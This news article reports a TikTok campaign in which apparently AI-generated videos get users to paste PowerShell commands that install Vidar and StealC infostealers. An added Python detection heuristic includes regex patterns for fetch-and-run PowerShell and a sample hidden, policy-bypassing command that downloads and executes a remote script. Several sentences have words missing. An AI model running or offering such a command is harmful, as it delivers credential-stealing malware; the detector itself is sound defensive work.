
These AI-Generated TikTok Videos Are Tricking People Into Installing Malware




In recent years, TikTok has become a prime target for scammers and cyber attackers spreading various forms of malware, and the latest shady campaign promotes instructional videos that trick users into downloading infostealers to their devices via ClickFix attacks.

The scheme, identified by Trend Micro and reported by Bleeping Computer, instructs users to execute commands to activate Windows and Microsoft or premium features in CapCut and Spotify. One video is captioned “Boost Your Spotify Experience Instantly — Here's How!” and has nearly half a million views.

These videos seem to be AI generated and, while the software they discuss is legitimate, the activation steps they outline are not, and will ultimately lead users to infect their devices with Vidar and StealC malware.

TikTok's engagement algorithm makes it easy for such malicious videos to spread. In the past, cybercriminals have used TikTok's trending “Invisible Challenge” to spread WASP Stealer malware, which can steal Discord accounts, , , and crypto wallets. Fake cryptocurrency giveaways posted on TikTok used deepfakes of (and themes around SpaceX and Tesla) to scam users into paying “activation” deposits using Bitcoin.

How TikTok ClickFix attacks work

ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command with malicious code. Users will see a pop-up notification about a technical problem with instructions to copy and run a command (commonly a PowerShell script) to “fix” the issue. The attack most often targets Windows users, but it has been employed on macOS and Linux too.



In the current TikTok campaign, the instructional videos prompt users to run a PowerShell command that installs Vidar or StealC information-stealing malware. The former can take desktop screenshots and harvest ranging from login credentials and cookies to credit cards and crypto wallets. The latter targets browsers and crypto wallets. Once run, the script will download a second PowerShell script allowing it to launch automatically upon device . It also saves in a hidden directory and deletes temporary folders so it can evade detection.
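As an added example (not from the original article or from Trend Micro's report), here is a minimal endpoint-side heuristic for the pattern described above: a pasted PowerShell command that fetches a second script from the network and runs it. The event format, the indicator set, the verdict names and the sample events are assumptions constructed for illustration.

```python
import re

# Indicators are real PowerShell cmdlets, aliases, switches or .NET methods.
# Which ones to combine, and how, is this example's assumption.
IS_PS = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
FETCH = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                   r"start-bitstransfer)\b|downloadstring|downloadfile", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://\S+", re.I)
EVASION = re.compile(r"-w(indowstyle)?\s+hid|-e(xecution)?p(olicy)?\s+bypass", re.I)


def indicators(cmdline):
    """Return the indicator names found in one process command line."""
    if not IS_PS.search(cmdline):
        return []
    found = []
    if FETCH.search(cmdline) and URL.search(cmdline):
        found.append("remote-fetch")
    if EXEC.search(cmdline):
        found.append("in-memory-exec")
    if EVASION.search(cmdline):
        found.append("hidden-or-bypass")
    return found


def triage(events):
    """Alert on fetch-and-run in one command; mark lone indicators for review."""
    results = []
    for ev in events:
        found = indicators(ev["cmdline"])
        hit = {"remote-fetch", "in-memory-exec"} <= set(found)
        verdict = "alert" if hit else "review" if found else "ok"
        results.append((ev["id"], verdict, found))
    return results


# Constructed process-creation events (not taken from the campaign).
SAMPLE_EVENTS = [
    {"id": 1, "cmdline": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/fix.ps1)"'},
    {"id": 2, "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"id": 3, "cmdline": 'pwsh -c "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"'},
    {"id": 4, "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

In practice the command lines would come from process-creation telemetry or PowerShell script block logging, and the "review" tier would need tuning against legitimate admin scripts.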

How to spot malicious TikTok videos

Be wary of following instructional videos you're served on TikTok (as well as unsolicited technical content in general). Check the source, and only engage with videos from legitimate sources, such as the developer itself. You should also look for signs of AI-generated content, which may be used to spread malware widely and rapidly. There's no malicious code actually embedded in or delivered by these instructional videos (the scheme depends on social engineering via verbal directions), making the threat technically harder to detect.




